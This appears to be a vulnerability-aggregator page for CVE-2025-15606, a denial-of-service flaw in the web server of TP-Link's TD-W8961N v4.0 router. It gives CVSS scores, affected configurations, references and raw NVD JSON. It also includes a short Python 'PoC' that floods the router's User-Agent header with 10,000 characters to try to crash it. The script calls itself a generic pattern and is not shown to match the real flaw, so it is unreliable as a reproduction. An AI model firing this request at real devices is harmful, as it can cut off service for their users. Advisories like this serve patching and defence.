CVE-2025-15606

Description

A Denial-of-Service (DoS) vulnerability in the httpd component of TP-Link's TD-W8961N v4.0 due to improper input sanitization, allows crafted requests to trigger a processing error that causes the httpd service to crash. Successful exploitation may allow the attacker to cause service interruption, resulting in a DoS condition.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:td-w8961nd_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:td-w8961n:4:*:*:*:*:*:*:* - NOT VULNERABLE

TP-Link TD-W8961N v4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/"

# Generate a long string to test input sanitization
# This is a generic PoC pattern for DoS via improper input handling
payload = "A" * 10000 

headers = {
    "User-Agent": payload,  # Testing header overflow/sanitization
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    print(f"Sending malicious request to {target_url}...")
    response = requests.get(target_url, headers=headers, timeout=5)
    print(f"Request sent. Status code: {response.status_code}")
    print("Check if the device web interface is still responsive.")
except Exception as e:
    print(f"An exception occurred (Service might be down): {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15606
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15606
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15606/
[4] VulDB https://vuldb.com/cve/CVE-2025-15606
[5] https://www.tp-link.com/en/support/download/td-w8961n/v4/#Firmware
[6] https://www.tp-link.com/us/support/faq/5028/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15606", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T19:16:38.867", "lastModified": "2026-03-31T19:04:18.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Denial-of-Service (DoS) vulnerability in the httpd component of TP-Link's TD-W8961N v4.0 due to improper input sanitization, allows crafted requests to trigger a processing error that causes the httpd service to crash. Successful exploitation may allow the attacker to cause service interruption, resulting in a DoS condition."}, {"lang": "es", "value": "Una vulnerabilidad de Denegación de Servicio (DoS) en el componente httpd de TP-Link TD-W8961N v4.0, debido a un saneamiento de entrada inadecuado, permite que solicitudes manipuladas desencadenen un error de procesamiento que provoca la caída del servicio httpd. La explotación exitosa puede permitir al atacante causar interrupción del servicio, resultando en una condición de DoS."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:td-w8961nd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "250925", "matchCriteriaId": "6BE3D1AD-2A42-409C-B538-58040C422F02"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:td-w8961n:4:*:*:*:*:*:*:*", "matchCriteriaId": "F9F4D974-5977-47B3-9889-280479073A1C"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/td-w8961n/v4/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5028/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}